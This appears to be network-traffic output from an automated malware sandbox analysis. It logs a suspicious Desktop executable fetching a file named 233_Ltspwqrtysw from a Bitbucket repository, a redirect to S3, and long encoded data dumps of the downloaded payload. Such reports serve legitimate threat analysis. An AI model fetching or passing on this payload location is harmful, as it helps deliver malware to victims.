                                                                                                                                        2024-10-23 05:02:14 UTC1024INData Raw: 6a 2b 56 6d 63 4b 37 72 70 64 50 63 69 32 7a 41 55 4e 49 78 74 51 69 69 38 79 44 69 2b 6d 61 74 55 37 42 73 5a 61 4a 4b 61 51 57 2b 2b 32 48 5a 41 49 30 61 31 65 56 56 77 4b 63 4c 75 7a 4b 67 6e 37 55 57 65 78 6d 5a 75 77 36 31 73 73 64 30 54 45 58 49 62 42 2b 34 56 4e 42 31 63 77 48 6d 66 30 44 4a 6f 53 33 6f 4e 4c 77 4d 36 6f 6e 71 61 75 59 6d 62 76 65 44 36 64 64 50 69 36 69 61 68 43 59 68 79 65 39 4b 64 56 78 61 42 50 43 78 6c 35 6f 61 42 39 4c 4f 73 37 43 66 59 65 34 62 79 6f 37 43 47 66 6b 76 47 75 79 30 4f 34 4c 6e 70 4a 6d 52 78 4a 59 4b 79 63 63 56 39 62 69 72 50 55 38 51 67 49 57 57 4c 6c 49 6e 65 44 30 69 74 59 50 34 4c 59 33 4c 4f 59 2b 72 64 2f 51 63 73 72 34 4b 37 6a 6d 44 74 57 35 37 75 68 74 45 62 58 30 30 41 38 77 35 30 76 6c 64 6b 4d 31
                                                                                                                                        Data Ascii: j+VmcK7rpdPci2zAUNIxtQii8yDi+matU7BsZaJKaQW++2HZAI0a1eVVwKcLuzKgn7UWexmZuw61ssd0TEXIbB+4VNB1cwHmf0DJoS3oNLwM6onqauYmbveD6ddPi6iahCYhye9KdVxaBPCxl5oaB9LOs7CfYe4byo7CGfkvGuy0O4LnpJmRxJYKyccV9birPU8QgIWWLlIneD0itYP4LY3LOY+rd/Qcsr4K7jmDtW57uhtEbX00A8w50vldkM1
                                                                                                                                        2024-10-23 05:02:14 UTC16384INData Raw: 43 71 32 56 4f 6d 2b 37 4a 4c 4a 71 32 64 2b 53 73 45 37 63 65 65 79 61 6a 30 57 68 6e 72 70 6b 42 44 4a 56 4d 70 37 34 4c 52 36 6f 63 73 4c 7a 7a 61 50 35 31 54 6e 74 4c 6e 46 76 32 2f 4a 36 4c 39 54 45 59 4f 4c 4e 43 64 54 64 7a 7a 66 50 50 4e 6a 58 51 4e 64 33 69 69 43 4e 43 6b 62 73 4f 50 36 77 42 31 57 45 55 75 36 61 67 36 31 57 31 4c 52 50 6b 35 53 34 37 57 47 6d 51 66 4f 63 62 52 76 30 58 42 36 4e 52 57 68 72 52 69 32 78 61 30 4a 69 66 6e 6e 6b 75 6e 58 6b 41 59 52 4e 71 73 61 4d 6e 4c 36 57 46 51 37 70 38 37 32 46 61 69 50 50 48 61 62 4f 74 79 71 30 69 79 67 54 44 56 66 41 41 63 51 4f 45 66 75 47 72 46 54 31 75 4c 32 76 5a 59 73 31 42 63 39 45 61 70 70 4e 6d 36 66 39 37 52 6a 43 35 54 48 72 53 30 72 70 6e 75 4e 74 6d 69 65 64 47 2f 6d 35 6b 6f 70
                                                                                                                                        Data Ascii: Cq2VOm+7JLJq2d+SsE7ceeyaj0WhnrpkBDJVMp74LR6ocsLzzaP51TntLnFv2/J6L9TEYOLNCdTdzzfPPNjXQNd3iiCNCkbsOP6wB1WEUu6ag61W1LRPk5S47WGmQfOcbRv0XB6NRWhrRi2xa0JifnnkunXkAYRNqsaMnL6WFQ7p872FaiPPHabOtyq0iygTDVfAAcQOEfuGrFT1uL2vZYs1Bc9EappNm6f97RjC5THrS0rpnuNtmiedG/m5kop
                                                                                                                                        2024-10-23 05:02:14 UTC1024INData Raw: 54 58 78 70 46 43 37 43 33 64 35 47 30 6c 63 63 61 6e 76 46 37 71 47 54 75 5a 38 6c 62 39 31 7a 6c 62 57 73 7a 39 2b 78 61 46 62 35 41 57 6c 37 6d 59 37 4a 67 63 71 4e 63 73 47 42 54 43 50 6c 61 65 42 36 36 2b 65 46 78 4a 74 32 39 6b 6a 61 6c 49 49 6c 75 65 67 74 72 67 38 4c 79 68 51 74 72 38 69 71 46 64 56 4c 65 6e 53 68 37 37 35 5a 64 46 47 49 4e 36 78 58 63 4e 42 6e 72 72 6d 65 64 6a 76 53 58 4f 71 31 57 7a 76 5a 41 31 71 6c 4a 31 5a 2f 59 72 62 2b 52 2f 64 6d 4d 79 43 51 64 33 75 48 34 69 6b 56 63 6d 67 44 55 68 4d 6c 2b 46 58 41 34 2b 78 53 56 6a 4f 63 57 4d 45 50 33 6d 70 67 31 4f 31 61 72 2f 30 49 4a 44 6f 43 33 64 43 41 31 55 55 64 7a 45 52 31 6c 37 4a 4f 54 7a 32 38 39 5a 76 42 53 71 76 67 68 69 5a 32 6a 34 6e 65 68 62 66 49 41 64 43 61 58 59 73
                                                                                                                                        Data Ascii: TXxpFC7C3d5G0lccanvF7qGTuZ8lb91zlbWsz9+xaFb5AWl7mY7JgcqNcsGBTCPlaeB66+eFxJt29kjalIIluegtrg8LyhQtr8iqFdVLenSh775ZdFGIN6xXcNBnrrmedjvSXOq1WzvZA1qlJ1Z/Yrb+R/dmMyCQd3uH4ikVcmgDUhMl+FXA4+xSVjOcWMEP3mpg1O1ar/0IJDoC3dCA1UUdzER1l7JOTz289ZvBSqvghiZ2j4nehbfIAdCaXYs
                                                                                                                                        2024-10-23 05:02:14 UTC16384INData Raw: 74 32 43 4a 51 54 4c 33 76 5a 42 71 52 71 45 6f 6a 31 54 44 63 4f 56 70 6d 41 72 77 47 6e 63 64 66 67 73 59 4c 42 47 49 4a 54 55 77 53 2f 62 2f 63 58 46 2f 51 6e 53 50 4a 31 42 43 76 35 62 57 4e 72 39 38 59 70 30 42 76 50 75 7a 6f 53 55 44 50 73 68 77 73 61 33 4e 6c 48 6f 62 38 38 73 4f 7a 77 4f 6f 79 43 2f 69 69 65 66 79 6e 48 56 72 54 74 41 6d 6d 34 39 5a 54 49 30 7a 77 46 73 6b 45 38 6a 37 6d 2b 6e 57 53 74 52 4f 68 4e 63 55 52 32 33 49 6d 6a 33 4d 41 39 54 32 78 69 7a 2f 48 34 6d 4b 2f 44 71 66 74 7a 67 2b 73 77 4d 70 79 50 79 39 78 47 79 44 64 5a 6e 55 4a 37 51 38 67 47 79 6a 51 65 7a 55 62 65 53 5a 7a 30 68 42 64 52 73 4c 75 62 61 31 44 75 51 56 37 51 79 4c 61 31 63 78 56 46 74 57 43 58 69 79 73 69 47 65 74 32 6b 7a 41 34 4c 6b 6e 5a 50 54 43 45 31
                                                                                                                                        Data Ascii: t2CJQTL3vZBqRqEoj1TDcOVpmArwGncdfgsYLBGIJTUwS/b/cXF/QnSPJ1BCv5bWNr98Yp0BvPuzoSUDPshwsa3NlHob88sOzwOoyC/iiefynHVrTtAmm49ZTI0zwFskE8j7m+nWStROhNcUR23Imj3MA9T2xiz/H4mK/Dqftzg+swMpyPy9xGyDdZnUJ7Q8gGyjQezUbeSZz0hBdRsLuba1DuQV7QyLa1cxVFtWCXiysiGet2kzA4LknZPTCE1
                                                                                                                                        2024-10-23 05:02:14 UTC1024INData Raw: 2b 52 48 32 6d 39 79 30 2f 50 31 57 58 54 6a 63 35 49 53 7a 52 43 37 50 66 54 6d 72 39 75 58 6d 66 72 5a 31 73 55 7a 50 4d 62 36 49 72 78 72 4a 55 38 7a 57 6b 49 64 57 73 41 59 57 74 34 6e 73 55 69 69 50 4e 4a 74 41 70 36 7a 78 51 4f 32 72 6e 72 42 65 4b 78 70 72 54 69 74 37 31 7a 49 71 50 50 31 72 33 4a 70 42 78 51 62 71 65 50 65 42 49 32 63 75 76 2b 67 77 51 64 39 2f 4b 53 2b 37 49 6b 2b 74 63 38 67 77 70 4d 58 35 4c 58 72 6c 7a 2b 6d 73 42 2f 42 51 36 39 59 72 66 54 45 47 31 76 65 47 6c 36 5a 78 46 6b 30 6d 36 6c 2f 50 39 77 51 52 42 52 6c 76 72 75 46 41 59 33 31 73 36 76 58 32 4f 71 36 4a 78 44 58 30 4c 49 41 43 77 73 78 31 71 71 4d 53 47 75 54 77 49 56 2b 38 42 4f 6b 42 66 64 69 71 71 64 62 43 4c 6d 50 4f 67 71 70 4f 41 56 77 73 76 4c 49 44 64 42 69
                                                                                                                                        Data Ascii: +RH2m9y0/P1WXTjc5ISzRC7PfTmr9uXmfrZ1sUzPMb6IrxrJU8zWkIdWsAYWt4nsUiiPNJtAp6zxQO2rnrBeKxprTit71zIqPP1r3JpBxQbqePeBI2cuv+gwQd9/KS+7Ik+tc8gwpMX5LXrlz+msB/BQ69YrfTEG1veGl6ZxFk0m6l/P9wQRBRlvruFAY31s6vX2Oq6JxDX0LIACwsx1qqMSGuTwIV+8BOkBfdiqqdbCLmPOgqpOAVwsvLIDdBi
                                                                                                                                        2024-10-23 05:02:14 UTC16384INData Raw: 43 6e 5a 56 70 69 74 54 69 61 39 47 30 69 31 49 51 78 51 46 62 51 62 6e 66 64 6f 55 54 66 2b 6c 72 58 70 39 49 53 51 78 75 67 58 78 70 6c 42 6f 39 2b 61 4a 75 65 48 4b 6e 2f 56 34 51 4b 41 66 71 68 53 61 35 6c 58 43 65 63 49 71 4b 65 73 4b 31 57 34 45 2f 34 58 78 45 78 2f 4d 6d 71 43 71 74 75 77 6b 63 6d 55 71 38 73 7a 72 43 47 49 39 68 45 4a 59 30 57 57 72 35 67 6a 51 4d 76 6d 44 59 74 41 77 39 6b 66 4d 46 38 79 36 33 4d 35 69 33 6d 6f 38 33 36 4c 51 56 32 44 2f 4b 45 34 76 70 4d 70 67 5a 69 77 36 43 44 69 76 38 2f 67 37 6b 7a 6d 30 6a 64 45 46 71 34 53 70 63 56 47 35 63 74 48 52 75 63 56 56 59 64 4f 49 32 54 4a 43 67 74 35 38 2b 7a 35 58 52 53 35 44 57 44 6f 46 6b 65 55 4d 77 57 6a 75 4f 70 36 62 2f 4d 78 76 34 38 6b 65 70 72 64 35 70 6a 6e 73 46 31 34
                                                                                                                                        Data Ascii: CnZVpitTia9G0i1IQxQFbQbnfdoUTf+lrXp9ISQxugXxplBo9+aJueHKn/V4QKAfqhSa5lXCecIqKesK1W4E/4XxEx/MmqCqtuwkcmUq8szrCGI9hEJY0WWr5gjQMvmDYtAw9kfMF8y63M5i3mo836LQV2D/KE4vpMpgZiw6CDiv8/g7kzm0jdEFq4SpcVG5ctHRucVVYdOI2TJCgt58+z5XRS5DWDoFkeUMwWjuOp6b/Mxv48keprd5pjnsF14
                                                                                                                                        2024-10-23 05:02:14 UTC1024INData Raw: 54 70 61 51 79 4b 68 5a 35 4b 58 4c 50 74 4d 76 42 67 46 6a 45 52 52 38 33 56 70 38 45 32 35 32 4c 4b 65 66 51 46 2f 38 31 50 4b 42 50 56 49 76 76 64 70 55 2b 35 72 2b 39 56 57 42 49 72 77 44 63 62 31 62 58 65 69 33 33 67 42 79 68 73 4f 59 30 6f 4d 67 4c 4f 75 46 41 47 54 64 54 42 45 6e 71 5a 49 6f 65 6d 30 39 32 48 75 4b 74 41 32 72 34 4b 50 68 6b 6e 2b 6c 53 53 44 59 62 34 78 6c 35 72 6b 32 69 66 4f 5a 56 57 53 64 47 78 6d 6c 42 6f 77 38 55 44 63 44 53 35 31 77 44 41 37 36 65 54 65 4d 55 53 2f 6f 34 32 49 7a 5a 44 6c 46 7a 6d 49 46 65 4e 2b 79 75 70 68 68 37 74 42 4e 31 55 69 45 4b 56 6a 39 4b 4e 43 31 4c 6f 68 32 42 6b 62 61 74 4d 42 47 5a 4a 47 51 2b 4c 45 38 79 35 53 55 45 42 39 41 50 56 4c 49 38 37 42 32 71 61 6b 2f 2b 43 32 37 73 52 75 65 52 47 33
                                                                                                                                        Data Ascii: TpaQyKhZ5KXLPtMvBgFjERR83Vp8E252LKefQF/81PKBPVIvvdpU+5r+9VWBIrwDcb1bXei33gByhsOY0oMgLOuFAGTdTBEnqZIoem092HuKtA2r4KPhkn+lSSDYb4xl5rk2ifOZVWSdGxmlBow8UDcDS51wDA76eTeMUS/o42IzZDlFzmIFeN+yuphh7tBN1UiEKVj9KNC1Loh2BkbatMBGZJGQ+LE8y5SUEB9APVLI87B2qak/+C27sRueRG3
                                                                                                                                        2024-10-23 05:02:14 UTC16384INData Raw: 5a 53 4e 64 57 64 62 62 73 2f 74 41 62 52 68 2b 6c 42 56 6a 36 6b 47 47 7a 45 65 4c 6c 6e 71 4e 42 56 48 4e 42 69 58 65 70 44 43 52 4e 57 48 73 79 44 51 64 36 55 47 64 6c 34 63 55 76 51 54 41 4e 57 42 46 42 63 67 33 59 4f 72 41 48 44 38 66 47 65 32 44 36 59 32 49 39 34 6a 52 6c 32 6f 42 64 59 6f 33 6a 7a 37 4e 79 39 75 6f 6c 36 4d 31 56 4a 77 6a 61 45 43 52 4b 46 43 46 52 6d 51 56 47 35 64 32 48 44 59 4e 6a 30 70 4d 6b 58 64 41 69 76 4b 37 71 64 6a 42 37 62 38 71 65 41 2f 50 44 41 36 41 51 61 5a 49 70 44 4d 6f 4b 68 33 79 2f 57 6a 2b 4d 36 7a 56 32 77 66 46 46 69 4e 77 56 49 56 71 61 53 4c 54 61 54 72 50 79 2f 4a 38 76 6f 66 4f 63 55 56 30 63 65 4e 7a 39 54 77 71 52 6c 55 68 44 2b 59 75 74 75 7a 43 6a 72 6a 7a 55 30 44 58 37 74 65 53 49 4d 52 57 76 33 74
                                                                                                                                        Data Ascii: ZSNdWdbbs/tAbRh+lBVj6kGGzEeLlnqNBVHNBiXepDCRNWHsyDQd6UGdl4cUvQTANWBFBcg3YOrAHD8fGe2D6Y2I94jRl2oBdYo3jz7Ny9uol6M1VJwjaECRKFCFRmQVG5d2HDYNj0pMkXdAivK7qdjB7b8qeA/PDA6AQaZIpDMoKh3y/Wj+M6zV2wfFFiNwVIVqaSLTaTrPy/J8vofOcUV0ceNz9TwqRlUhD+YutuzCjrjzU0DX7teSIMRWv3t


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        4192.168.2.749707185.166.143.484436452C:\Users\user\Desktop\z10982283782.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-10-23 05:02:16 UTC187OUTGET /akeem4u/canter/downloads/233_Ltspwqrtysw HTTP/1.1
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Accept: */*
                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                        Host: bitbucket.org
                                                                                                                                        2024-10-23 05:02:16 UTC5172INHTTP/1.1 302 Found
                                                                                                                                        Date: Wed, 23 Oct 2024 05:02:16 GMT
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Content-Length: 0
                                                                                                                                        Server: AtlassianEdge
                                                                                                                                        Location: https://bbuseruploads.s3.amazonaws.com/1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/a122b37b-2be1-4956-a228-3e44b96626b8/233_Ltspwqrtysw?response-content-disposition=attachment%3B%20filename%3D%22233_Ltspwqrtysw%22&AWSAccessKeyId=ASIA6KOSE3BNA3TNBD6S&Signature=bquajkbDUnHiY6Qk9cEyy3Ji0xM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEE0aCXVzLWVhc3QtMSJIMEYCIQDWLdnMpGGZVnfuf5mZ7tkLhGS%2BHN%2Fi5hrbwc5K5HeekAIhALFcc1ROzTR8B4kcaA2oVW3sq0zTC7bxDYRYDuyXyj6sKrACCLb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgyNe%2FRStUblqwXyTbkqhAK8BQ1NlXfF77BQxUe%2BLDGJ72hzvISSyyG1nPahXGTPb9H%2F4F2%2F5GlsBuXRyGcOQkj4ERRXbeHiahdKc%2BywbR6YEWoYOH14NAUuJivTj9fBN6WDk7UmQ8nnk5IxunnOohsVHIhsiRtMzjGYE3m%2BT3Nv%2B2LBuAC5kTgwrpgGcGd3z79%2FubqvQWKpCPk5OQo1tvOyZDdGiaMdoJrU%2F%2B%2F6PyCU39h28LMR4%2BdAAh6%2FYzNlkOlxzs7Ih0fOSFaTs1BSOSRuTvP9GixHrOn3THgqHyMm8F1oMbov2tlWw%2BCDNj5ns8S8xb%2BGRMfWJz69PjosPmJKRQvcpZYEVJ%2Fuao%2BBg6rxNrk1bzCkhuK4BjqcAeGCMiJnZekyMuhm2XJ%2FmPZHGuv1mMGkMdY36AKfCoyDFZlLRnUelBbsByQxcf9NuZCZIj5sRzg6N9aafMqZIWX [TRUNCATED]
                                                                                                                                        Expires: Wed, 23 Oct 2024 05:02:16 GMT
                                                                                                                                        Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                        X-Used-Mesh: False
                                                                                                                                        Vary: Accept-Language, Origin
                                                                                                                                        Content-Language: en
                                                                                                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                        X-Dc-Location: Micros-3
                                                                                                                                        X-Served-By: b98c7a43676b
                                                                                                                                        X-Version: 4bc3453affe5
                                                                                                                                        X-Static-Version: 4bc3453affe5
                                                                                                                                        X-Request-Count: 2489
                                                                                                                                        X-Render-Time: 0.07113289833068848
                                                                                                                                        X-B3-Traceid: af4677fd16334c56882315d9be66852c
                                                                                                                                        X-B3-Spanid: 35e1c29ecbdedee4
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend [TRUNCATED]
                                                                                                                                        X-Usage-Quota-Remaining: 998551.793
                                                                                                                                        X-Usage-Request-Cost: 1034.67
                                                                                                                                        X-Usage-User-Time: 0.030719
                                                                                                                                        X-Usage-System-Time: 0.000321
                                                                                                                                        X-Usage-Input-Ops: 0
                                                                                                                                        X-Usage-Output-Ops: 0
                                                                                                                                        Age: 0
                                                                                                                                        X-Cache: MISS
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                        Atl-Traceid: af4677fd16334c56882315d9be66852c
                                                                                                                                        Atl-Request-Id: af4677fd-1633-4c56-8823-15d9be66852c
                                                                                                                                        Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                        Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                        Server-Timing: atl-edge;dur=179,atl-edge-internal;dur=3,atl-edge-upstream;dur=178,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        5192.168.2.74971354.231.236.1294436452C:\Users\user\Desktop\z10982283782.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-10-23 05:02:17 UTC1295OUTGET /1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/a122b37b-2be1-4956-a228-3e44b96626b8/233_Ltspwqrtysw?response-content-disposition=attachment%3B%20filename%3D%22233_Ltspwqrtysw%22&AWSAccessKeyId=ASIA6KOSE3BNA3TNBD6S&Signature=bquajkbDUnHiY6Qk9cEyy3Ji0xM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEE0aCXVzLWVhc3QtMSJIMEYCIQDWLdnMpGGZVnfuf5mZ7tkLhGS%2BHN%2Fi5hrbwc5K5HeekAIhALFcc1ROzTR8B4kcaA2oVW3sq0zTC7bxDYRYDuyXyj6sKrACCLb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgyNe%2FRStUblqwXyTbkqhAK8BQ1NlXfF77BQxUe%2BLDGJ72hzvISSyyG1nPahXGTPb9H%2F4F2%2F5GlsBuXRyGcOQkj4ERRXbeHiahdKc%2BywbR6YEWoYOH14NAUuJivTj9fBN6WDk7UmQ8nnk5IxunnOohsVHIhsiRtMzjGYE3m%2BT3Nv%2B2LBuAC5kTgwrpgGcGd3z79%2FubqvQWKpCPk5OQo1tvOyZDdGiaMdoJrU%2F%2B%2F6PyCU39h28LMR4%2BdAAh6%2FYzNlkOlxzs7Ih0fOSFaTs1BSOSRuTvP9GixHrOn3THgqHyMm8F1oMbov2tlWw%2BCDNj5ns8S8xb%2BGRMfWJz69PjosPmJKRQvcpZYEVJ%2Fuao%2BBg6rxNrk1bzCkhuK4BjqcAeGCMiJnZekyMuhm2XJ%2FmPZHGuv1mMGkMdY36AKfCoyDFZlLRnUelBbsByQxcf9NuZCZIj5sRzg6N9aafMqZIWX0TejNIhed6dqnVS8HwylTQKvAyrfpMWEXQYcoRuCgC5H [TRUNCATED]
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Accept: */*
                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                        Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                        2024-10-23 05:02:17 UTC544INHTTP/1.1 200 OK
                                                                                                                                        x-amz-id-2: CvC/J79JTF6bW3cM79iISTaFOLeJJiBd7lPPlUvocEdnfTur0Odx55NchTQPo58v2SQI1Uy7ktQ=
                                                                                                                                        x-amz-request-id: T5R1QSZTA91PBE10
                                                                                                                                        Date: Wed, 23 Oct 2024 05:02:18 GMT
                                                                                                                                        Last-Modified: Tue, 22 Oct 2024 05:16:04 GMT
                                                                                                                                        ETag: "5d7ab335987101c49bbbe6ebcea19843"
                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                        x-amz-version-id: aV2sZzfG3ESjVStuXavykQrQq1UCdUQQ
                                                                                                                                        Content-Disposition: attachment; filename="233_Ltspwqrtysw"
                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        Server: AmazonS3
                                                                                                                                        Content-Length: 383200
                                                                                                                                        Connection: close
                                                                                                                                        2024-10-23 05:02:17 UTC1413INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 52 47 41 34 57 47 79 55 65 46 78 55 58 46 53 55 53 4a 42 77 69 47 79 49 53 4a 69 4d 50 4a 79 63 52 46 52 4d 52 48 69 51 6a 47 68 55 57 49 51 38 5a 4a 52 51 52 49 78 45 65 47 68 77 6c 47 68 55 59 47 52 51 56 70 71 36 6c 57 53 4f 6e 73 55 74 58 49 53 41 64 4a 42 34 66 49 53 59 67 4a 4b 61 75 70 56 6b 6a 70 37 46 4c 61 46 39 6c 58 57 4a 73 64 56 35 63 58 6c 78 73 61 58 74 6a 65 57 4a 35 61 57 31 36 5a 6d 35 75 61 46 78 71 61 48 56 37 65 6d 46 63 58 58 68 6d 59 47 78 72 61 48 70 6f 64 57 46 6a 62 47 46 63 58 32 42 72 58 47 68 66 5a 56 31 69 62 48 56 65 58 46 35 63 62 47 6c 37 59 33 6c 69 65 57 6c 74 65 6d 5a 75 62 6d 68 63 61 6d 68 31 65 33 70 68 58 46 31 34 5a 6d 42 73 61 32 68 36 61 48 56 68 59 32 78 68 58 46 39 67 61 31 78
                                                                                                                                        Data Ascii: pq6lWSOnsUsRGA4WGyUeFxUXFSUSJBwiGyISJiMPJycRFRMRHiQjGhUWIQ8ZJRQRIxEeGhwlGhUYGRQVpq6lWSOnsUtXISAdJB4fISYgJKaupVkjp7FLaF9lXWJsdV5cXlxsaXtjeWJ5aW16Zm5uaFxqaHV7emFcXXhmYGxraHpodWFjbGFcX2BrXGhfZV1ibHVeXF5cbGl7Y3lieWltemZubmhcamh1e3phXF14ZmBsa2h6aHVhY2xhXF9ga1x
                                                                                                                                        2024-10-23 05:02:17 UTC16384INData Raw: 56 75 62 42 41 56 4a 30 68 74 70 64 7a 50 32 75 67 4d 65 51 71 69 71 44 74 41 57 78 52 73 65 57 41 4b 39 42 6e 66 50 4e 2f 63 67 53 41 64 6d 32 35 6d 51 37 70 35 37 59 2f 43 44 6b 4e 2b 4b 58 36 41 53 76 45 68 35 72 67 72 6b 62 79 67 6d 48 5a 34 63 45 53 68 37 47 66 62 76 35 31 63 48 38 41 70 62 39 5a 68 47 71 66 71 38 73 70 61 46 4c 6a 71 59 72 5a 55 50 41 74 66 74 4e 44 74 49 75 67 65 6a 30 79 73 77 38 6e 75 51 6d 59 43 6a 61 6b 6c 51 59 55 42 6c 59 6c 68 32 32 5a 68 36 70 77 4f 6d 56 32 4c 68 69 4d 38 35 7a 72 6a 4a 31 53 58 62 6a 67 56 48 4f 31 4a 36 51 4b 4f 55 4e 2f 54 7a 6e 79 73 4d 4c 61 6a 45 72 37 71 47 41 39 56 71 7a 46 75 58 76 7a 2b 50 63 67 78 63 4e 65 58 53 65 59 4f 53 72 63 78 77 55 4f 70 2f 68 69 6a 35 41 2b 75 6e 79 68 4f 72 47 38 63 78
                                                                                                                                        Data Ascii: VubBAVJ0htpdzP2ugMeQqiqDtAWxRseWAK9BnfPN/cgSAdm25mQ7p57Y/CDkN+KX6ASvEh5rgrkbygmHZ4cESh7Gfbv51cH8Apb9ZhGqfq8spaFLjqYrZUPAtftNDtIugej0ysw8nuQmYCjaklQYUBlYlh22Zh6pwOmV2LhiM85zrjJ1SXbjgVHO1J6QKOUN/TznysMLajEr7qGA9VqzFuXvz+PcgxcNeXSeYOSrcxwUOp/hij5A+unyhOrG8cx
                                                                                                                                        2024-10-23 05:02:17 UTC1024INData Raw: 74 51 69 69 38 79 44 69 2b 6d 61 74 55 37 42 73 5a 61 4a 4b 61 51 57 2b 2b 32 48 5a 41 49 30 61 31 65 56 56 77 4b 63 4c 75 7a 4b 67 6e 37 55 57 65 78 6d 5a 75 77 36 31 73 73 64 30 54 45 58 49 62 42 2b 34 56 4e 42 31 63 77 48 6d 66 30 44 4a 6f 53 33 6f 4e 4c 77 4d 36 6f 6e 71 61 75 59 6d 62 76 65 44 36 64 64 50 69 36 69 61 68 43 59 68 79 65 39 4b 64 56 78 61 42 50 43 78 6c 35 6f 61 42 39 4c 4f 73 37 43 66 59 65 34 62 79 6f 37 43 47 66 6b 76 47 75 79 30 4f 34 4c 6e 70 4a 6d 52 78 4a 59 4b 79 63 63 56 39 62 69 72 50 55 38 51 67 49 57 57 4c 6c 49 6e 65 44 30 69 74 59 50 34 4c 59 33 4c 4f 59 2b 72 64 2f 51 63 73 72 34 4b 37 6a 6d 44 74 57 35 37 75 68 74 45 62 58 30 30 41 38 77 35 30 76 6c 64 6b 4d 31 73 56 55 57 56 72 70 6c 36 67 4f 42 74 6c 4b 59 57 71 2b 79
                                                                                                                                        Data Ascii: tQii8yDi+matU7BsZaJKaQW++2HZAI0a1eVVwKcLuzKgn7UWexmZuw61ssd0TEXIbB+4VNB1cwHmf0DJoS3oNLwM6onqauYmbveD6ddPi6iahCYhye9KdVxaBPCxl5oaB9LOs7CfYe4byo7CGfkvGuy0O4LnpJmRxJYKyccV9birPU8QgIWWLlIneD0itYP4LY3LOY+rd/Qcsr4K7jmDtW57uhtEbX00A8w50vldkM1sVUWVrpl6gOBtlKYWq+y
                                                                                                                                        2024-10-23 05:02:17 UTC15360INData Raw: 65 65 79 61 6a 30 57 68 6e 72 70 6b 42 44 4a 56 4d 70 37 34 4c 52 36 6f 63 73 4c 7a 7a 61 50 35 31 54 6e 74 4c 6e 46 76 32 2f 4a 36 4c 39 54 45 59 4f 4c 4e 43 64 54 64 7a 7a 66 50 50 4e 6a 58 51 4e 64 33 69 69 43 4e 43 6b 62 73 4f 50 36 77 42 31 57 45 55 75 36 61 67 36 31 57 31 4c 52 50 6b 35 53 34 37 57 47 6d 51 66 4f 63 62 52 76 30 58 42 36 4e 52 57 68 72 52 69 32 78 61 30 4a 69 66 6e 6e 6b 75 6e 58 6b 41 59 52 4e 71 73 61 4d 6e 4c 36 57 46 51 37 70 38 37 32 46 61 69 50 50 48 61 62 4f 74 79 71 30 69 79 67 54 44 56 66 41 41 63 51 4f 45 66 75 47 72 46 54 31 75 4c 32 76 5a 59 73 31 42 63 39 45 61 70 70 4e 6d 36 66 39 37 52 6a 43 35 54 48 72 53 30 72 70 6e 75 4e 74 6d 69 65 64 47 2f 6d 35 6b 6f 70 33 44 74 57 4b 56 34 61 38 2b 73 78 47 71 7a 72 4a 73 7a 77
                                                                                                                                        Data Ascii: eeyaj0WhnrpkBDJVMp74LR6ocsLzzaP51TntLnFv2/J6L9TEYOLNCdTdzzfPPNjXQNd3iiCNCkbsOP6wB1WEUu6ag61W1LRPk5S47WGmQfOcbRv0XB6NRWhrRi2xa0JifnnkunXkAYRNqsaMnL6WFQ7p872FaiPPHabOtyq0iygTDVfAAcQOEfuGrFT1uL2vZYs1Bc9EappNm6f97RjC5THrS0rpnuNtmiedG/m5kop3DtWKV4a8+sxGqzrJszw
